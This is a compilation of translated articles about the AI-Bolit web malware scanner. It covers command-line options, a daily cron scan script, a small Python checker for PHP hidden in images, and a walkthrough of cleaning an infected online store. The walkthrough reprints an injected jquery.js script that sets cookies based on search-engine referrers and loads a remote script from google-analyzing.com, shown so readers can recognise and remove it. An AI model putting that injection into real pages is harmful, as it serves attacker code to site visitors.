Hardware and software setup

How to work with the AI-BOLIT scanner from the command line. AI-Bolit: an effective scanner for viruses and other malicious code on hosting

Unpleasant situations take us by surprise. Sometimes users install software on their sites that has vulnerabilities, or attackers find "holes" in freely distributed software. After discovering such "holes", hackers begin to exploit the victim's account and inject harmful program code: all kinds of hacker shells, backdoors, spam mailers and other malicious scripts.

Alas, some users do not update the software on their websites in time and become victims of such cybercriminals.

The essence of the problem

Our server software in most cases identifies the harmful load and automatically eliminates the “bad” activity.

What exactly does malicious software do? Very different things: it sends spam, participates in attacks on other resources, and so on. One striking example of such a virus is "MAYHEM, a multipurpose bot for *NIX servers". This virus, for example, is explained very accessibly by Yandex specialists in their blog or

Hostland is constantly delighting its customers with new anti-virus tools!

We present a very convenient and free tool for finding viruses, malicious and hacker scripts on your account: shells found by signatures and flexible patterns, shells found by simple heuristics, everything that ordinary antiviruses and scanners cannot find.

We present to our users "AI-Bolit" from the company "Revisium".

Features of the AI-Bolit scanner:

  • Search for hacker php and perl scripts (shells, backdoors), virus inserts, doorways, spam mailers, scripts selling links, cloaking scripts and other types of malicious scripts. Search by patterns and regular expressions, as well as the use of simple heuristics to identify potentially malicious code
  • Search for scripts with critical vulnerabilities (timthumb.php, uploadify, fckeditor, phpmyadmin, and others)
  • Search for scripts that are not typical for php sites (.sh, .pl, .so, etc.)
  • Search for signatures in encrypted, fragmented text blocks and hex / oct / dec encoded sequences
  • Search for suspicious files with constructs used in malicious scripts
  • Find hidden links in files
  • Search symbolic links
  • Search for search-engine and mobile redirect code
  • Search for inclusions via auto_prepend_file / auto_append_file and AddHandler directives
  • Find iframe inserts
  • Determining the version and type of cms
  • Search hidden files
  • Search for .php files with double extensions and .php files uploaded as GIF images
  • Search for doorways and directories containing a suspiciously large number of php / html files
  • Find executable binaries
  • Convenient filtering and sorting of file lists in the report
  • Russian interface

What else is important to know?

If malicious software was found on your account using "AI-Bolit", then simply deleting these files will not solve the problem of your site's vulnerability.

You need to find out how the hacker was able to inject the "bad" script onto your site, i.e. find the "hole" in its software. Sometimes this requires changing the FTP passwords, updating the "site engine", sometimes studying the server log files (if they are disabled, enable them), and sometimes involving a third-party security specialist.

And the whole complex of the above measures will be the best help in solving the problem of the security of your site!

Detection of all malicious scripts cannot be guaranteed. Therefore, the developer of the scanner and the hosting provider are not responsible for the possible consequences of false positives during the operation of the AI-Bolit scanner or for unjustified expectations of users regarding its functionality and capabilities.

You can send comments and suggestions on the script's operation, as well as undetected malicious scripts to [email protected]

The greatest functionality is available when the AI-BOLIT scanner is launched from the command line. This can be done under Windows / Unix / Mac OS X, or directly on the hosting if you have SSH access and the hosting does not greatly limit the processor resources consumed.

Please note that the console version of PHP 7.1 or higher is required to run the scanner. Earlier versions are not officially supported. Check the current version with the php -v command.

AI-BOLIT Scanner Command Line Parameter Reference

Show help

php ai-bolit.php --help

Skip files with the listed extensions

php ai-bolit.php --skip=jpg,png,gif,jpeg,JPG,PNG,GIF,bmp,xml,zip,rar,css,avi,mov

Scan specific extensions only

php ai-bolit.php --scan=php,php5,pht,phtml,pl,cgi,htaccess,suspected,tpl

Prepare a quarantine file for sending to security specialists. Archive AI-QUARANTINE-XXXX.zip with password will be created.

php ai-bolit.php --quarantine

Run the scanner in "paranoid" mode (recommended to get the most detailed report)

php ai-bolit.php --mode=2

Run the scanner in "expert" mode

php ai-bolit.php --mode=1

Check one file "pms.db" for malicious code

php ai-bolit.php -jpms.db

Run the scanner with a 512MB memory limit

php ai-bolit.php --memory=512M

Set the maximum size of a scanned file to 900KB

php ai-bolit.php --size=900K

Pause 500ms between files when scanning (to reduce load)

php ai-bolit.php --delay=500

Send scan report to email [email protected]

php ai-bolit.php --report=[email protected]

Create a report in the file /home/scanned/report_site1.html

php ai-bolit.php --report=/home/scanned/report_site1.html

Scan the directory /home/s/site1/public_html/ (the report will be created there by default if the --report=report_file option is not specified)

php ai-bolit.php --path=/home/s/site1/public_html/

Execute the command upon completion of the scan.

php ai-bolit.php --cmd="~/postprocess.sh"

Get a plain-text report named site1.txt

php ai-bolit.php -lsite1.txt

You can combine calls, for example

php ai-bolit.php --size=300K --path=/home/s/site1/public_html/ --mode=2 --scan=php,phtml,pht,php5,pl,cgi,suspected

By combining the AI-BOLIT scanner with other unix commands you can, for example, batch-scan sites. Below is an example of checking several sites hosted within one account. If the sites are located inside the /var/www/user1/data/www directory, the command to launch the scanner will be

find /var/www/user1/data/www -maxdepth 1 -type d -exec php ai-bolit.php --path={} --mode=2 \;

By adding the --report parameter, you can control the directory in which scan reports will be generated.

php ai-bolit.php <parameter list> ... --eng

Switch the report interface to English. This parameter must come last.

Integration with other services and into the hosting panel

php ai-bolit.php --json_report=/path/file.json

Generate a report in JSON format

php ai-bolit.php --progress=/path/progress.json

Save the scan status to a JSON file. The file contains structured data: the file currently being scanned, how many files have been scanned, how many remain, the percentage completed and the time until the scan is finished. This mechanism can be used to show a progress bar and data on the scanned files in the hosting panel. After the scan is complete, the file is deleted automatically.

php ai-bolit.php --handler=/path/handler.php

External event handler. You can add your own handlers for scan start, scan end, scan progress and scan errors. An example file can be found in the scanner archive as tools/handler.php. For example, after the scan is complete you can do something with the report file (send it by mail, pack it into an archive, etc.).

Probably everyone who creates websites encounters viruses and trojans on the site. The first problem is to notice the problem in time, until the moment when projects grab pessimization from search engines or burden the hoster (for DDoS, spam).

This article is being written in hot pursuit: during a regular backup to a Windows machine, ESET Smart Security suddenly started flagging the site's pictures as viral. It turned out that the FilesMan backdoor had been uploaded to the site with the help of pictures.

The hole was that the script that allowed users to upload pictures to the site checked that the file was a picture only by its extension. The content was not checked at all. You should not do that ;) As a result, any php file could be uploaded to the site under the guise of an image. But this is not about holes...
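As an added example (not AI-Bolit's code and not from the article), here is a small Python checker that applies two of the heuristics the scanner's feature list describes to exactly this kind of hole: image files whose content is PHP rather than an image, and double extensions such as image.php.jpg. The sample upload directory and file names are constructed for the demonstration.

```python
"""Heuristic checks for PHP disguised as images, modelled on two of the
AI-Bolit checks listed above. Added example, not the scanner's own code."""
import os
import re
import tempfile

# Magic bytes a file with this extension is expected to start with.
IMAGE_MAGIC = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}
PHP_EXTS = {".php", ".php5", ".pht", ".phtml", ".phar"}
PHP_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)


def classify(path):
    """Return a list of findings for one file; an empty list means nothing suspicious."""
    findings = []
    parts = os.path.basename(path).lower().split(".")
    exts = ["." + p for p in parts[1:]]
    # shell.php.gif, image.php.jpg: a PHP extension anywhere before the last one
    if len(exts) >= 2 and any(e in PHP_EXTS for e in exts[:-1]):
        findings.append("double extension with php")
    with open(path, "rb") as fh:
        head = fh.read(64 * 1024)          # enough to see the header and a prepended tag
    last = exts[-1] if exts else ""
    if last in IMAGE_MAGIC:
        if not head.startswith(IMAGE_MAGIC[last]):
            findings.append("image extension but no image header")
        if PHP_TAG.search(head):
            findings.append("php code inside image file")
    return findings


def scan_tree(root):
    """Walk a directory and map relative path -> findings, for flagged files only."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            hits = classify(full)
            if hits:
                report[os.path.relpath(full, root)] = hits
    return report


def build_sample_tree():
    """Constructed sample upload directory (not real site data)."""
    root = tempfile.mkdtemp(prefix="uploads-")
    samples = {
        "logo.gif": b"GIF89a" + b"\x00" * 32,                 # genuine image
        "avatar.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,     # genuine image
        "photo.gif": b"GIF89a<?php echo 1; ?>",               # PHP behind a GIF header
        "image.php.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,   # double extension
        "img.jpg": b"<?php /* constructed sample */ ?>",      # plain PHP named .jpg
    }
    for name, data in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    for rel, hits in sorted(scan_tree(build_sample_tree()).items()):
        print(rel, "->", ", ".join(hits))
```

The same logic run by the upload handler itself (before the file is written) closes the hole the article describes; run over an existing tree it gives a first triage list to compare with the scanner's report.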

The point is that there was a task of daily checking all files of the site for viruses and Trojans.

Checking a website for viruses online

Online site checks for viruses are not suitable for these purposes at all. Online crawlers behave like a search engine robot, sequentially going through all the available pages of the site; the transition to the next page happens through links from other pages. Accordingly, if an attacker has uploaded a backdoor to your site via a picture, there is no link to this picture anywhere on the site's pages, and the attacker has not defaced the site or hung a virus on its pages, then an online virus check simply will not find this picture and will not find the virus.

Why, you ask, would an attacker do this? Why upload a backdoor and do nothing? The answer is: for spam, for DDoS, for other malicious activity that is not reflected in any way on the pages of the site.

In a word, an online site check for viruses is completely useless for real peace of mind.

Plugin for checking WordPress site for viruses and Trojans

There is a great antivirus plugin for WordPress. It is called. In my case, it perfectly found the pictures with FilesMan and cleaned the site from viruses. But it has an important flaw: during the check it puts a wild load on the server, because it simply iterates over all the files sequentially. In addition, out of the box the check is done only manually; it is not possible to automate site checking with the plugin.

And a virus can be picked up not only on WordPress; something universal is needed.

Checking the content of the site with a regular antivirus

As mentioned above, the problems were discovered quite by accident by an ordinary desktop antivirus during a backup. Of course, you can download the entire site every day and check it with a regular antivirus. All this is quite workable, but:

  • firstly, I want automation, so that the check runs automatically and produces a ready-made report;
  • secondly, there are sites that are simply unrealistic to download every time.

Trying AI-Bolit

I have dragged out the introduction. As a result of all my searches I found a wonderful FREE antivirus for websites: AI-Bolit. It supports different usage schemes; I used it via ssh.

Whether it can be used on shared hosting I did not figure out, but I think it is possible. AI-Bolit is written in php and can be launched from the browser, so purely technically it is probably possible on shared hosting.

Important! Aibolit does not cure a site of viruses; it ONLY FINDS them and gives a report listing which files it considers dangerous. What to do with them is up to you. Therefore, simply clicking a button and curing the site of Trojans will not work.

How to use AI-Bolit on VDS with ssh

Aibolit has instructions and workshops on using this antivirus. In general, the sequence is simple:

  • download it
  • unpack it on the server (I unpacked to /root/ai)
  • then from the ssh console run php /root/ai/ai-bolit/ai-bolit.php
  • the check can take hours, depending on the size of the site
  • based on the results of the check, a report file AI-BOLIT-REPORT-<date>-<time>.html is created

Problem files will be visible in the report file, if any.

Heavy load on the server

The main problem you face with an automatic site check for viruses is the load on the server. All antiviruses act in the same way, sequentially going through all available files, and aibolit is no exception: it just takes all the files and checks them sequentially. The load jumps and it can take a long time, which is not acceptable in production.

But aibolit has a very handy feature (provided that you have a full-fledged server or VDS with root access). First you create a list of files to check, and then feed this list to aibolit, which will only go through that list.

To form the list, you can use any server-side means. I ended up with the following bash script:

# bash /root/ai/run.sh
# https://revisium.com/kb/ai-bolit-console-faq.html
DOMAIN="site"
AI_PATH="/root/ai"
# %H instead of %k so the hour is zero-padded rather than space-padded in the file name
NOW=$(date +"%F-%H-%M-%S")
# you can make a public folder with password access
REPORT_PATH="$AI_PATH/reports/$DOMAIN-$NOW.html"
SCAN_PATH="/home/azzrael/web/$DOMAIN/public_html/"
SCAN_DAYS=90
# full scan of the whole site (commented out):
#php /home/admin/ai/ai-bolit/ai-bolit.php --mode=1 --path=$SCAN_PATH --report=$REPORT_PATH
# Scan only files changed in the last X days.
# The list file name AI-BOLIT-DOUBLECHECK.php is hardcoded by the aibolit authors for --with-2check !!!
find "$SCAN_PATH" -type f -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php"
# variants: only php-like files, or php-like files plus gif images
#find "$SCAN_PATH" -type f -name "*.ph*" -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php"
#find "$SCAN_PATH" -type f \( -name "*.ph*" -o -name "*.gif" \) -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php"
php "$AI_PATH/ai-bolit/ai-bolit.php" --mode=1 --report="$REPORT_PATH" --with-2check
#history -c

Here you can see that with the find command we collect all the files created in the last SCAN_DAYS days, save them to the AI-BOLIT-DOUBLECHECK.php list (at the time of use, the list file could not be renamed), then feed this list to aibolit. SCAN_DAYS can be as small as one day. If you put bash /root/ai/run.sh in the daily cron, the list of files to check will not be very large, so the check will not take much time and will not load the server too much.

AI-Bolit - an effective hosted virus and other malicious code scanner

We are often asked - what is the uniqueness of the AI-Bolit scanner? How does it differ from other similar search tools for malicious code, such as maldet, clamav, or even desktop antivirus software? The short answer is that it better detects malicious code written in PHP and Perl. Why? The answer is below.

Every day, malicious code (hacker web shells, backdoors, etc.) becomes more sophisticated and complex. In addition to obfuscation of identifiers and code encryption, implicit function calls through methods with callable arguments, handlers and indirect function calls have come into use everywhere.

There are fewer and fewer malicious scripts with a linear structure and fixed identifiers. Authors try to disguise the code and make it as changeable as possible, "polymorphic", or, on the contrary, make it as simple as possible and similar to a regular script.

Sometimes, when analyzing a malicious script, it is impossible to isolate a fixed fragment by which the "malware" could be unambiguously identified. Obviously, such malicious code cannot be found using a simple signature database (anti-virus database), which is what the vast majority of web antiviruses and hosted scanners use. To efficiently search for modern "malware", it is necessary to use more sophisticated methods for detecting viral patterns, and in some cases heuristics. This is the approach we use in the AI-BOLIT malware scanner.
The use of a large database of constantly improving flexible patterns based on regular expressions, the use of additional heuristic analysis, developed on the basis of scanning a large number of infected sites, made the AI-Bolit scanner the most effective and actively used tool for the administrator and web developer.

AI-Bolit is also widely known due to its simple interface and the possibility of free use for non-commercial purposes. Any webmaster can download AI-Bolit absolutely free from the official website http://revisium.com/ai/ and check their resource for hacker shells, backdoors, doorways, viruses, spam mailers, hidden links and other malicious fragments and inserts. The scanner is also actively used by commercial companies - web studios, hosting companies and internet agencies to check and treat client sites. Hosters integrate AI-Bolit into the control panel, web developers use it to search for malicious code and in their own website monitoring services.

Below is just a small list of the capabilities of the Ai-Bolit scanner:

  • launch from console and browser
  • three scanning modes ("simple", "expert", "paranoid") and two modes of operation ("express" and "full scan")
  • search for hacker php and perl scripts (shells, backdoors), virus inserts, doorways, spam mailers, scripts selling links, cloaking scripts and other types of malicious scripts. Search by patterns and regular expressions, as well as the use of heuristics to identify potentially malicious code
  • search for signatures in encrypted, fragmented text blocks and hex / oct / dec encoded sequences
  • search for suspicious files with constructs used in malicious scripts
  • search for hidden links in files
  • search for symbolic links
  • search for the code of search and mobile redirects and much more.
By the way, Ai-Bolit received a copyright certificate from RosPatent. And the scanner is actively covered on third-party sites, in specialized magazines, at conferences and webinars.

Official script page

Today I was asked for help in cleaning an online store from viruses. Unexpectedly, one of the employees had received a refusal to advertise on Google Adwords. The letter indicated that suspicious code was present in the file jquery.js.

First of all, I opened the path to this file in the browser, but Avast antivirus did not react to this file, although I could already see the malicious code visually. Then I connected via FTP with FileZilla and tried to open the file with Notepad++. And here my antivirus blocked access to the file.

To clean the js file of the virus, I had to disable AVAST for 10 minutes and then delete the malicious lines from the file.

If you encounter a similar problem, remove the following code as shown in the picture, or these lines.

var r = document.referrer;
var c = document.cookie;
r1 = 0;
if ((r.indexOf("yandex") > 0) || (r.indexOf("google") > 0) || (r.indexOf("rambler") > 0) || (r.indexOf("mail") > 0)) {
    document.cookie = "__ga1=1; expires=Wed, 1 Mar 2020 00:00:00; path=/;";
    r1 = 1;
} else {
    if (c.indexOf("__ga1") == -1) {
        document.cookie = "__ga2=1; expires=Wed, 1 Mar 2020 00:00:00; path=/;";
    }
}
if (((c.indexOf("__ga1") > -1) || (r1 == 1)) && (c.indexOf("__ga2") == -1)) {
    document.write(unescape("%3Cscript src=\"http://google-analyzing.com/urchin.js\" type=\"text/javascript\"%3E%3C/script%3E"));
}

Site backup.

Next, connect via ssh, for example using the putty utility, and if possible make an archive of the site. To do this, just use the following command in the console:

tar -cf backup.tar /home/login/site/public_html

* /home/login/site/public_html is the full path to the main directory of the site

You don't have to back up the site, but you never know whether you will delete something important.

Now there are two options for checking the site for viruses

1. Check the site using the php script Ai-Bolit, which looks for various viruses as well as php shells.

2. Download the entire site to your computer and scan it with Avast antivirus; but the first option is much better and more convenient.

Site cleaning on local computer

At first I used the second method, so I will describe it. After all the files (or the archive) were downloaded to the computer, and there are a little more than 25,000 of them, I opened Avast and pointed it at the folder with the site files to check them for malicious scripts.

After Avast performed a scan, two script viruses were found in the folder with the website files:

  • Php-shell-jv
  • Js-Redirector-Fc

The index.php file consisted of the following code:

The javascript file "ui.datepicker_old.js" had malicious code at the very bottom of the script content. This code must be removed!

Cleaning the site from viruses using Ai-Bolit.

Ftp way.

1. Download the archive with the Aibolit script to the local computer and unpack it.

2. Connect via ftp using the FileZilla client.

3. Place the unpacked archive files in the main directory of the site /home/your_site/public_html

4. Run the script http://your_domain/ai-bolit.php

5. The report file will be created in the main directory with the name AI-BOLIT-REPORT.html

If a blank white screen is displayed after running the script, then the php version on the hosting server is not suitable for Aibolit.

Attention! If you need to check all sites in the directory, put the script into the /home/domains/ or /home/ folder; then Ai-Bolit will recursively go through all the folders and give a report, but it seems better to me to check one domain at a time.

Console option (SSH)

1. Launch the Putty program or another console program.

2. Connect to the server by host and password.

3. Go to the main directory of the site with the command cd /home/your_login/your_site/public_html/

4. Download the script with the command wget http://www..zip

5. Unpack the zip archive with the command unzip 20160904_112415ai-bolit.zip

6. Run the script with php ai-bolit.php

To run it in the background, use the command: screen -d -m php ai-bolit.php

7. Wait for the script to finish the check and create a report like "AI-BOLIT-REPORT.html" on the server.

Also note that if your server has php below 5.3 installed, Aibolit will show an error and will not start scanning. In my case, I had to download the site and check it on my own server.

After the report file is created on the server, you can download it to your computer and view it with a regular browser (Chrome, Firefox, etc.).

First of all, you should pay attention to the "Malicious scripts" section of the report, and then either carefully delete these files or clean them manually, as I do.
